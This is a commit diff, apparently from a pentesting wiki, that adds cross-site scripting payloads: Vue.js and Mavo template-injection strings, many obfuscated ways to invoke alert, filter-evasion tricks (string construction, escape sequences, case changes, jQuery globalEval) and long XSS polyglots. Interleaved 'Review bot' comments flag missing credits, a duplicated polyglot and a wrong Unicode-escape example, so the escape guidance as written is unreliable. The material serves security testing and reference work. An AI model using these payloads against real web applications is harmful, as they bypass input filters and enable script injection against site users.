GitBook: [master] 2 pages modified

This commit is contained in:
CPol 2021-02-25 11:39:28 +00:00 committed by gitbook-bot
parent 7517161d89
commit b524d4bca9
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 72 additions and 1 deletions

View File

@ -35,12 +35,30 @@ And the **source code** of the vulnerable example here: [https://github.com/azu/
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
```
### **V3**
```text
{{_openBlock.constructor('alert(1)')()}}
```
Credit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
### **V2**
```text
{{constructor.constructor('alert(1)')()}}
```
Credit: [Mario Heiderich](https://twitter.com/cure53berlin)
### Mavo
Payload:
```text
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
```
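Review bot: the Mavo entry is the only one in this hunk without a credit or reference line; the V3 and V2 entries above it each cite their source, so add a `Credit:` line in the same style. The three Mavo payloads are also listed with no note of where each applies, and the second one is double URL-encoded (`%252f`) unlike the other two, which a reader cannot tell is intentional; one short sentence per payload, as the V3/V2 sections effectively have via their links, would make the block usable as documentation.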

View File

@ -421,8 +421,60 @@ Set.constructor`al\x65rt\x2814\x29```;
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
globalThis[`al`+/ert/.source]`1`
this[`al`+/ert/.source]`1`
[alert][0].call(this,1)
window['a'+'l'+'e'+'r'+'t']()
window['a'+'l'+'e'+'r'+'t'].call(this,1)
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
(1,2,3,4,5,6,7,8,alert)(1)
x=alert,x(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
al\u0065rt`1`
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
```
### General tricks
**To constructing strings**
Regex literals:
`/part1/.source+/part2/.source` =&gt; `'part1part2'`
Numbers to strings:
`8680439..toString(30)` =&gt; `'alert'` \( Number is generated using parseInt\(“alert”,30\), other bases also work \)
**use character escape sequences inside of strings**
simple tool for this is available [here](https://mothereff.in/js-escapes):
`"\x41" -> "A"`: hex encoding
`"\u0065" -> "A"`: unicode encoding \(value is decimal\)
`"\101" -> "A"`: octal encoding
**VaRy ThE capItaliZatiOn**
Sometimes a regex or other custom-made filters do case sensitive matching. You can then just use a toLowerCase\(\), like:
`globalThis["aLeRt".toLowerCase()]`
**Calling functions**
``alert`1``` : Template literal syntax
`alert.apply(this,[1])`: Using Function.prototype.apply
`alert.call(this,1)`: Using Function.prototype.call
`alert(1)`: Obviously, but included for completeness.
`[1].find(alert)`: Using predicates
`[1].filter(alert)`: Using predicates
**Reuse and recycle**
Remember to look into what is already loaded! jQuery is an easy example, but any sufficiently complex framework will likely have something usable. [Wappalyzer](https://chrome.google.com/webstore/detail/wappalyzer/gppongmhjkpfnbhagpmjfkannfbllamg?hl=en) or equivalent can help here.
`window.jQuery.globalEval("alert(1)")`
`$.globalEval("alert(1)")`
## **DOM vulnerabilities**
There is **JS code** that is using **unsafely data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.
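Review bot: the Unicode escape example under **use character escape sequences inside of strings** is wrong: `"\u0065"` evaluates to `"e"`, not `"A"`, and the escape takes four hex digits, not a decimal value. Either change it to `"\u0041" -> "A"` with `(value is hex)` or keep `\u0065` and change the result to `"e"`. Minor wording: the heading **To constructing strings** should read **Constructing strings**, and the sentence opening **DOM vulnerabilities** reads better as "There is JS code that unsafely uses data controlled by an attacker, like `location.href`."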
@ -667,6 +719,7 @@ There is **C2** dedicated to the **exploitation of Service Workers** called [**S
### Polyglots
```javascript
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
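Review bot: the first line of this polyglot block duplicates the fourth line of the block in the following hunk, except that here it contains `&lt;svg` where the other copy has `<svg`; the entity looks like an accidental HTML-escape in the markdown and the two copies will render differently. Suggest keeping a single copy. Style: the block is HTML with inline JavaScript rather than plain JavaScript, so the fence would be more accurately tagged `html`, and the very long fourth line would be easier to read split at its `<script>` boundaries.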
@ -685,7 +738,7 @@ javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`